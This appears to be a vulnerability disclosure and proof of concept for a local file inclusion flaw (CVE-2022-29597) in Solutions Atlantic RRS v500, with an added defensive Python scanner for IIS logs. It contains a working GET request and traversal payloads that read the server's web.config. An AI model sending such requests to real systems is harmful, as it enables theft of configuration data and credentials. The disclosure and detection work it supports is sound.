CVE-2022-29597 PoC — Solutions Atlantic Regulatory Reporting System Path Traversal Vulnerability

Source
Associated Vulnerability
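Title: Solutions Atlantic Regulatory Reporting System Path Traversal Vulnerability (CVE-2022-29597)
Description: Solutions Atlantic Regulatory Reporting System (Solutions Atlantic RRS) is the flagship regulatory reporting system product of the US company Solutions Atlantic. It automates global shareholding disclosure monitoring and reporting workflows across more than 100 jurisdictions. Solutions Atlantic Regulatory Reporting System (RRS) v500 contains a security vulnerability that stems from its susceptibility to local file inclusion (LFI). An attacker can exploit this vulnerability when, against RRSWeb/mai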
Description
The RRS v500 application is vulnerable to a Local File Inclusion (LFI) vulnerability.
Readme
# CVE-2022-29597: Local File Inclusion in RRS v500

The [RRS](https://solutions-atlantic.com/regulatory-reporting-system/) v500 application by Solutions Atlantic is vulnerable to a Local File Inclusion (LFI) vulnerability. Any authenticated user can reference internal system files in requests made to the `/RRSWeb/maint/ShowDocument/ShowDocument.aspx` page, and the server responds with the contents of the requested file. This could allow adversaries to extract sensitive data and/or files from the underlying file system, gain knowledge about the internal workings of the system, or access the source code of the application.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597

NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597

## Proof of Concept (POC):

### Show Document Functionality:

**Affected URL:** 

- `/RRSWeb/maint/ShowDocument/ShowDocument.aspx`

While opening or downloading a PDF from the RRS site, a request is made to the affected URL that includes a `fileName` parameter. This parameter can be modified to include an internal system path, such as the path to `web.config`. The server will then serve the requested file.

**GET request with internal path to web.config:**

```http
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive


```

Server Response:

![RRS_LFI_web.config](https://raw.githubusercontent.com/TheGetch/CVE-2022-XXXXX-LFI/main/RRS_LFI_web.config.png)
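
A defender's view of the request above, as an added example that is not part of the original README: a Python scan of IIS W3C logs for `ShowDocument.aspx` requests whose `fileName` value is not a bare PDF name. The log lines are constructed, and the rule that legitimate values are plain `.pdf` names is an assumption to verify against the deployment's normal traffic.

```python
import re
from urllib.parse import parse_qsl, unquote

TARGET = "/rrsweb/maint/showdocument/showdocument.aspx"  # affected URL, lower-cased

# Constructed IIS W3C log lines (users, addresses, times and file names are invented).
SAMPLE_LOG = r"""
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2022-04-12 14:01:07 GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx fileName=Q1_filing.pdf alice 10.0.0.5 200
2022-04-12 14:03:44 GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config bob 10.0.0.9 200
2022-04-12 14:04:10 GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx filename=..%5C..%5Cweb.config bob 10.0.0.9 500
2022-04-12 14:05:02 GET /RRSWeb/default.aspx - alice 10.0.0.5 200
"""

def classify(raw):
    """Return the reasons a fileName value points outside a bare PDF name."""
    name = raw
    for _ in range(3):  # undo nested percent-encoding before matching
        name = unquote(name)
    name = name.replace("/", "\\")
    reasons = []
    if re.match(r"[A-Za-z]:", name):
        reasons.append("drive-letter path")
    if name.startswith("\\"):
        reasons.append("rooted or UNC path")
    if ".." in name.split("\\"):
        reasons.append("parent-directory segment")
    if not name.lower().endswith(".pdf"):  # assumption: real documents are PDFs
        reasons.append("non-PDF target")
    return reasons

def scan(log_text):
    """Return (user, client_ip, status, value, reasons) for each flagged request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() != TARGET:
            continue
        for key, value in parse_qsl(row.get("cs-uri-query", ""), keep_blank_values=True):
            # ASP.NET treats query-string keys case-insensitively
            if key.lower() == "filename" and (reasons := classify(value)):
                hits.append((row["cs-username"], row["c-ip"], row["sc-status"], value, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 means the file was served; the same user and client address in other flagged rows show what else was requested.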


## Discovery
April 2022
- Eric Getchell - TheGetch
